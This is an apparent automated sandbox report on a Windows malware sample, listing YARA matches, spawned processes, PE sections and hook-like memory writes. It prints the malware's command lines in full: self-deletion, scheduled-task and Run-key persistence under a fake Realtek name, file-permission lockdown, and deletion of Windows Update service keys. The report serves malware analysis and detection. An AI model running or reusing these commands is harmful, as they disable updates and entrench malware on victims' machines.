Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\library[1].bin, type: DROPPED | Matched rule: SUSP_Two_Byte_XOR_PE_And_MZ author = Wesley Shields <wxs@atarininja.org>, description = Look for 2 byte xor of a PE starting at offset 0, score = 2021-10-11, reference = https://gist.github.com/wxsBSD/bf7b88b27e9f879016b5ce2c778d3e83 |
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\library[1].bin, type: DROPPED | Matched rule: SUSP_Four_Byte_XOR_PE_And_MZ author = Wesley Shields <wxs@atarininja.org>, description = Look for 4 byte xor of a PE starting at offset 0, score = 2021-10-11, reference = https://gist.github.com/wxsBSD/bf7b88b27e9f879016b5ce2c778d3e83 |
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\library[1].bin, type: DROPPED | Matched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings |
Source: unknown | Process created: C:\Users\user\Desktop\DQxttu2Qrr.exe C:\Users\user\Desktop\DQxttu2Qrr.exe |
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe | Process created: C:\ProgramData\61312899942613011832.exe "C:\ProgramData\61312899942613011832.exe" |
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout /t 6 & del /f /q "C:\Users\user\Desktop\DQxttu2Qrr.exe" & exit |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 6 |
Source: C:\ProgramData\61312899942613011832.exe | Process created: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe "C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe" |
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN gntuud.exe /TR "C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe" /F |
Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "gntuud.exe" /P "user:N"&&CACLS "gntuud.exe" /P "user:R" /E&&echo Y|CACLS "..\03bd543fce" /P "user:N"&&CACLS "..\03bd543fce" /P "user:R" /E&&Exit |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y" |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cacls.exe CACLS "gntuud.exe" /P "user:N" |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cacls.exe CACLS "gntuud.exe" /P "user:R" /E |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y" |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cacls.exe CACLS "..\03bd543fce" /P "user:N" |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cacls.exe CACLS "..\03bd543fce" /P "user:R" /E |
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe | Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\c33e9ad058e5d3\cred64.dll, Main |
Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe |
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe | Process created: C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe "C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe" |
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe | Process created: C:\Users\user\1000018002\avicapn32.exe "C:\Users\user\1000018002\avicapn32.exe" |
Source: unknown | Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f |
Source: unknown | Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
Source: C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#qgoyddbo#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'RtkAudUService64.exe' /tr '''C:\Users\user\Locktime\RtkAudUService64.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Locktime\RtkAudUService64.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'RtkAudUService64.exe' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "RtkAudUService64.exe" /t REG_SZ /f /d 'C:\Users\user\Locktime\RtkAudUService64.exe' } |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc stop UsoSvc |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0 |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-dc 0 |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc stop wuauserv |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0 |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc stop bits |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc stop dosvc |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-dc 0 |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f |
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe | Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\1000019012\syncfiles.dll, rundll |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f |
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe | Process created: C:\Users\user\AppData\Roaming\1000020000\umciavi64.exe "C:\Users\user\AppData\Roaming\1000020000\umciavi64.exe" |
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe | Process created: unknown unknown |
Source: C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f |
Source: C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 |
Source: C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe | Process created: unknown unknown |
Source: C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe | Process created: unknown unknown |
Source: C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe | Process created: unknown unknown |
Source: C:\Users\user\AppData\Roaming\1000020000\umciavi64.exe | Process created: unknown unknown |
Source: C:\Users\user\AppData\Roaming\1000020000\umciavi64.exe | Process created: unknown unknown |
Source: C:\Users\user\AppData\Roaming\1000020000\umciavi64.exe | Process created: unknown unknown |
Source: DQxttu2Qrr.exe, 00000000.00000002.325985352.0000000027895000.00000004.00000800.00020000.00000000.sdmp, DQxttu2Qrr.exe, 00000000.00000002.331294538.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp | Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger'); |
Source: DQxttu2Qrr.exe, 00000000.00000002.325985352.0000000027895000.00000004.00000800.00020000.00000000.sdmp, DQxttu2Qrr.exe, 00000000.00000002.331294538.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB); |
Source: DQxttu2Qrr.exe, 00000000.00000002.325985352.0000000027895000.00000004.00000800.00020000.00000000.sdmp, DQxttu2Qrr.exe, 00000000.00000002.331294538.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB); |
Source: DQxttu2Qrr.exe, 00000000.00000002.325985352.0000000027895000.00000004.00000800.00020000.00000000.sdmp, DQxttu2Qrr.exe, 00000000.00000002.331294538.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx)); |
Source: DQxttu2Qrr.exe, 00000000.00000002.325985352.0000000027895000.00000004.00000800.00020000.00000000.sdmp, DQxttu2Qrr.exe, 00000000.00000002.331294538.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp | Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q); |
Source: DQxttu2Qrr.exe, 00000000.00000002.325985352.0000000027895000.00000004.00000800.00020000.00000000.sdmp, DQxttu2Qrr.exe, 00000000.00000002.331294538.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN); |
Source: DQxttu2Qrr.exe, 00000000.00000002.325985352.0000000027895000.00000004.00000800.00020000.00000000.sdmp, DQxttu2Qrr.exe, 00000000.00000002.331294538.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB); |
Source: DQxttu2Qrr.exe, 00000000.00000002.325985352.0000000027895000.00000004.00000800.00020000.00000000.sdmp, DQxttu2Qrr.exe, 00000000.00000002.331294538.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode); |
Source: DQxttu2Qrr.exe, 00000000.00000002.325985352.0000000027895000.00000004.00000800.00020000.00000000.sdmp, DQxttu2Qrr.exe, 00000000.00000002.331294538.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN); |
Source: DQxttu2Qrr.exe | Static PE information: section name: .rrt00 |
Source: DQxttu2Qrr.exe | Static PE information: section name: .rrt01 |
Source: DQxttu2Qrr.exe | Static PE information: section name: .rrt02 |
Source: 61312899942613011832.exe.0.dr | Static PE information: section name: lB@dO\ih |
Source: 61312899942613011832.exe.0.dr | Static PE information: section name: Fh?jG[OJ |
Source: 61312899942613011832.exe.0.dr | Static PE information: section name: qNR5:WbS |
Source: 61312899942613011832.exe.0.dr | Static PE information: section name: z?fd8ijJ |
Source: 61312899942613011832.exe.0.dr | Static PE information: section name: CV?7x>JO |
Source: 61312899942613011832.exe.0.dr | Static PE information: section name: EVjKc_MI |
Source: 61312899942613011832.exe.0.dr | Static PE information: section name: dT<:EHzj |
Source: 61312899942613011832.exe.0.dr | Static PE information: section name: @]topACL |
Source: nppshell[1].exe.0.dr | Static PE information: section name: lB@dO\ih |
Source: nppshell[1].exe.0.dr | Static PE information: section name: Fh?jG[OJ |
Source: nppshell[1].exe.0.dr | Static PE information: section name: qNR5:WbS |
Source: nppshell[1].exe.0.dr | Static PE information: section name: z?fd8ijJ |
Source: nppshell[1].exe.0.dr | Static PE information: section name: CV?7x>JO |
Source: nppshell[1].exe.0.dr | Static PE information: section name: EVjKc_MI |
Source: nppshell[1].exe.0.dr | Static PE information: section name: dT<:EHzj |
Source: nppshell[1].exe.0.dr | Static PE information: section name: @]topACL |
Source: gntuud.exe.4.dr | Static PE information: section name: lB@dO\ih |
Source: gntuud.exe.4.dr | Static PE information: section name: Fh?jG[OJ |
Source: gntuud.exe.4.dr | Static PE information: section name: qNR5:WbS |
Source: gntuud.exe.4.dr | Static PE information: section name: z?fd8ijJ |
Source: gntuud.exe.4.dr | Static PE information: section name: CV?7x>JO |
Source: gntuud.exe.4.dr | Static PE information: section name: EVjKc_MI |
Source: gntuud.exe.4.dr | Static PE information: section name: dT<:EHzj |
Source: gntuud.exe.4.dr | Static PE information: section name: @]topACL |
Source: syncfiles[1].dll.13.dr | Static PE information: section name: *;>%1sXO |
Source: syncfiles[1].dll.13.dr | Static PE information: section name: 7rP!Ni:j |
Source: syncfiles[1].dll.13.dr | Static PE information: section name: bkE<E2?8 |
Source: syncfiles[1].dll.13.dr | Static PE information: section name: 8*7`Joyq |
Source: syncfiles[1].dll.13.dr | Static PE information: section name: 0Ys'"rSd |
Source: syncfiles[1].dll.13.dr | Static PE information: section name: nUPwRZiK |
Source: syncfiles[1].dll.13.dr | Static PE information: section name: $u!6XeN& |
Source: syncfiles[1].dll.13.dr | Static PE information: section name: K)'tLNvc |
Source: syncfiles.dll.13.dr | Static PE information: section name: *;>%1sXO |
Source: syncfiles.dll.13.dr | Static PE information: section name: 7rP!Ni:j |
Source: syncfiles.dll.13.dr | Static PE information: section name: bkE<E2?8 |
Source: syncfiles.dll.13.dr | Static PE information: section name: 8*7`Joyq |
Source: syncfiles.dll.13.dr | Static PE information: section name: 0Ys'"rSd |
Source: syncfiles.dll.13.dr | Static PE information: section name: nUPwRZiK |
Source: syncfiles.dll.13.dr | Static PE information: section name: $u!6XeN& |
Source: syncfiles.dll.13.dr | Static PE information: section name: K)'tLNvc |
Source: cred64[1].dll.13.dr | Static PE information: section name: f5g\gWe7 |
Source: cred64[1].dll.13.dr | Static PE information: section name: zDthL)*@ |
Source: cred64[1].dll.13.dr | Static PE information: section name: nb"h!m#Y |
Source: cred64[1].dll.13.dr | Static PE information: section name: $^+<%+dU |
Source: cred64[1].dll.13.dr | Static PE information: section name: Z-),j99t |
Source: cred64[1].dll.13.dr | Static PE information: section name: 8"ikKHD[ |
Source: cred64[1].dll.13.dr | Static PE information: section name: k&l<0?<6 |
Source: cred64[1].dll.13.dr | Static PE information: section name: n[uZh3ex |
Source: cred64[1].dll.13.dr | Static PE information: section name: Uh%r6i!H |
Source: cred64.dll.13.dr | Static PE information: section name: f5g\gWe7 |
Source: cred64.dll.13.dr | Static PE information: section name: zDthL)*@ |
Source: cred64.dll.13.dr | Static PE information: section name: nb"h!m#Y |
Source: cred64.dll.13.dr | Static PE information: section name: $^+<%+dU |
Source: cred64.dll.13.dr | Static PE information: section name: Z-),j99t |
Source: cred64.dll.13.dr | Static PE information: section name: 8"ikKHD[ |
Source: cred64.dll.13.dr | Static PE information: section name: k&l<0?<6 |
Source: cred64.dll.13.dr | Static PE information: section name: n[uZh3ex |
Source: cred64.dll.13.dr | Static PE information: section name: Uh%r6i!H |
Source: Emit64[1].exe.13.dr | Static PE information: section name: 87*qGv;7 |
Source: Emit64[1].exe.13.dr | Static PE information: section name: ^NsFAbb[ |
Source: Emit64[1].exe.13.dr | Static PE information: section name: 4.ps1S[" |
Source: Emit64[1].exe.13.dr | Static PE information: section name: l^D/X#s1 |
Source: Emit64[1].exe.13.dr | Static PE information: section name: aAyXB94] |
Source: Emit64[1].exe.13.dr | Static PE information: section name: n9Mms2uS |
Source: Emit64[1].exe.13.dr | Static PE information: section name: 7u=]29J1 |
Source: Emit64[1].exe.13.dr | Static PE information: section name: *<5LK<h` |
Source: Emit64[1].exe.13.dr | Static PE information: section name: Ug$Va';z |
Source: Emit64[1].exe.13.dr | Static PE information: section name: dA:<*dF( |
Source: Emit64[1].exe.13.dr | Static PE information: section name: r,Ht]nHV |
Source: Emit64[1].exe.13.dr | Static PE information: section name: m$m2M1,9 |
Source: Emit64[1].exe.13.dr | Static PE information: section name: o?%]P5Wl |
Source: Emit64[1].exe.13.dr | Static PE information: section name: lNMkoK?T |
Source: Emit64.exe.13.dr | Static PE information: section name: 87*qGv;7 |
Source: Emit64.exe.13.dr | Static PE information: section name: ^NsFAbb[ |
Source: Emit64.exe.13.dr | Static PE information: section name: 4.ps1S[" |
Source: Emit64.exe.13.dr | Static PE information: section name: l^D/X#s1 |
Source: Emit64.exe.13.dr | Static PE information: section name: aAyXB94] |
Source: Emit64.exe.13.dr | Static PE information: section name: n9Mms2uS |
Source: Emit64.exe.13.dr | Static PE information: section name: 7u=]29J1 |
Source: Emit64.exe.13.dr | Static PE information: section name: *<5LK<h` |
Source: Emit64.exe.13.dr | Static PE information: section name: Ug$Va';z |
Source: Emit64.exe.13.dr | Static PE information: section name: dA:<*dF( |
Source: Emit64.exe.13.dr | Static PE information: section name: r,Ht]nHV |
Source: Emit64.exe.13.dr | Static PE information: section name: m$m2M1,9 |
Source: Emit64.exe.13.dr | Static PE information: section name: o?%]P5Wl |
Source: Emit64.exe.13.dr | Static PE information: section name: lNMkoK?T |
Source: avicapn32[1].exe.13.dr | Static PE information: section name: .n3DK0 |
Source: avicapn32[1].exe.13.dr | Static PE information: section name: .symtab |
Source: avicapn32[1].exe.13.dr | Static PE information: section name: .n3DK1 |
Source: avicapn32[1].exe.13.dr | Static PE information: section name: .n3DK2 |
Source: avicapn32[1].exe.13.dr | Static PE information: section name: .n3DK3 |
Source: avicapn32.exe.13.dr | Static PE information: section name: .n3DK0 |
Source: avicapn32.exe.13.dr | Static PE information: section name: .symtab |
Source: avicapn32.exe.13.dr | Static PE information: section name: .n3DK1 |
Source: avicapn32.exe.13.dr | Static PE information: section name: .n3DK2 |
Source: avicapn32.exe.13.dr | Static PE information: section name: .n3DK3 |
Source: RtkAudUService64.exe.26.dr | Static PE information: section name: 87*qGv;7 |
Source: RtkAudUService64.exe.26.dr | Static PE information: section name: ^NsFAbb[ |
Source: RtkAudUService64.exe.26.dr | Static PE information: section name: 4.ps1S[" |
Source: RtkAudUService64.exe.26.dr | Static PE information: section name: l^D/X#s1 |
Source: RtkAudUService64.exe.26.dr | Static PE information: section name: aAyXB94] |
Source: RtkAudUService64.exe.26.dr | Static PE information: section name: n9Mms2uS |
Source: RtkAudUService64.exe.26.dr | Static PE information: section name: 7u=]29J1 |
Source: RtkAudUService64.exe.26.dr | Static PE information: section name: *<5LK<h` |
Source: RtkAudUService64.exe.26.dr | Static PE information: section name: Ug$Va';z |
Source: RtkAudUService64.exe.26.dr | Static PE information: section name: dA:<*dF( |
Source: RtkAudUService64.exe.26.dr | Static PE information: section name: r,Ht]nHV |
Source: RtkAudUService64.exe.26.dr | Static PE information: section name: m$m2M1,9 |
Source: RtkAudUService64.exe.26.dr | Static PE information: section name: o?%]P5Wl |
Source: RtkAudUService64.exe.26.dr | Static PE information: section name: lNMkoK?T |
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe | Memory written: PID: 2508 base: 680005 value: E9 FB 99 26 77 |
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe | Memory written: PID: 2508 base: 778E9A00 value: E9 0A 66 D9 88 |
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe | Memory written: PID: 2508 base: 690007 value: E9 7B 4C 29 77 |
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe | Memory written: PID: 2508 base: 77924C80 value: E9 8E B3 D6 88 |
Source: C:\ProgramData\61312899942613011832.exe | Memory written: PID: 5372 base: 660005 value: E9 FB 99 28 77 |
Source: C:\ProgramData\61312899942613011832.exe | Memory written: PID: 5372 base: 778E9A00 value: E9 0A 66 D7 88 |
Source: C:\ProgramData\61312899942613011832.exe | Memory written: PID: 5372 base: 670007 value: E9 7B 4C 2B 77 |
Source: C:\ProgramData\61312899942613011832.exe | Memory written: PID: 5372 base: 77924C80 value: E9 8E B3 D4 88 |
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe | Memory written: PID: 5780 base: 15D0005 value: E9 FB 99 31 76 |
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe | Memory written: PID: 5780 base: 778E9A00 value: E9 0A 66 CE 89 |
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe | Memory written: PID: 5780 base: 15E0007 value: E9 7B 4C 34 76 |
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe | Memory written: PID: 5780 base: 77924C80 value: E9 8E B3 CB 89 |
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: PID: 6128 base: DB0005 value: E9 FB 99 B3 76 |
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: PID: 6128 base: 778E9A00 value: E9 0A 66 4C 89 |
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: PID: 6128 base: DC0007 value: E9 7B 4C B6 76 |
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: PID: 6128 base: 77924C80 value: E9 8E B3 49 89 |
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: PID: 6128 base: F70005 value: E9 FB BF 94 76 |
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: PID: 6128 base: 778BC000 value: E9 0A 40 6B 89 |
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: PID: 6128 base: FA0008 value: E9 AB E0 95 76 |
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: PID: 6128 base: 778FE0B0 value: E9 60 1F 6A 89 |
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: PID: 6128 base: FB0005 value: E9 CB 5A 95 73 |
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: PID: 6128 base: 74905AD0 value: E9 3A A5 6A 8C |
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: PID: 6128 base: FC0005 value: E9 5B B0 96 73 |
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: PID: 6128 base: 7492B060 value: E9 AA 4F 69 8C |
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: PID: 6128 base: 1210005 value: E9 DB F8 A9 75 |
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: PID: 6128 base: 76CAF8E0 value: E9 2A 07 56 8A |
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: PID: 6128 base: 1220005 value: E9 FB 42 AB 75 |
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: PID: 6128 base: 76CD4300 value: E9 0A BD 54 8A |
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe | Memory written: PID: 4948 base: 1340005 value: E9 FB 99 5A 76 |
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe | Memory written: PID: 4948 base: 778E9A00 value: E9 0A 66 A5 89 |
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe | Memory written: PID: 4948 base: 1350007 value: E9 7B 4C 5D 76 |
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe | Memory written: PID: 4948 base: 77924C80 value: E9 8E B3 A2 89 |
Source: C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe | Memory written: PID: 3920 base: 7FFC32240008 value: E9 7B A9 EA FF |
Source: C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe | Memory written: PID: 3920 base: 7FFC320EA980 value: E9 90 56 15 00 |
Source: C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe | Memory written: PID: 3920 base: 7FFC3225000D value: E9 6B 9B EC FF |
Source: C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe | Memory written: PID: 3920 base: 7FFC32119B70 value: E9 AA 64 13 00 |
Source: C:\Users\user\1000018002\avicapn32.exe | Memory written: PID: 1112 base: 1C70005 value: E9 FB 99 C7 75 |
Source: C:\Users\user\1000018002\avicapn32.exe | Memory written: PID: 1112 base: 778E9A00 value: E9 0A 66 38 8A |
Source: C:\Users\user\1000018002\avicapn32.exe | Memory written: PID: 1112 base: 1C90007 value: E9 7B 4C C9 75 |
Source: C:\Users\user\1000018002\avicapn32.exe | Memory written: PID: 1112 base: 77924C80 value: E9 8E B3 36 8A |
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: PID: 2820 base: FB0005 value: E9 FB 99 93 76 |
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: PID: 2820 base: 778E9A00 value: E9 0A 66 6C 89 |
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: PID: 2820 base: FC0007 value: E9 7B 4C 96 76 |
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: PID: 2820 base: 77924C80 value: E9 8E B3 69 89 |
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: PID: 2820 base: FD0005 value: E9 FB BF 8E 76 |
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: PID: 2820 base: 778BC000 value: E9 0A 40 71 89 |
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: PID: 2820 base: 1170008 value: E9 AB E0 78 76 |
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: PID: 2820 base: 778FE0B0 value: E9 60 1F 87 89 |
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: PID: 2820 base: 1180005 value: E9 CB 5A 78 73 |
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: PID: 2820 base: 74905AD0 value: E9 3A A5 87 8C |
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: PID: 2820 base: 1190005 value: E9 5B B0 79 73 |
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: PID: 2820 base: 7492B060 value: E9 AA 4F 86 8C |
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: PID: 2820 base: 11A0005 value: E9 DB F8 B0 75 |
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: PID: 2820 base: 76CAF8E0 value: E9 2A 07 4F 8A |
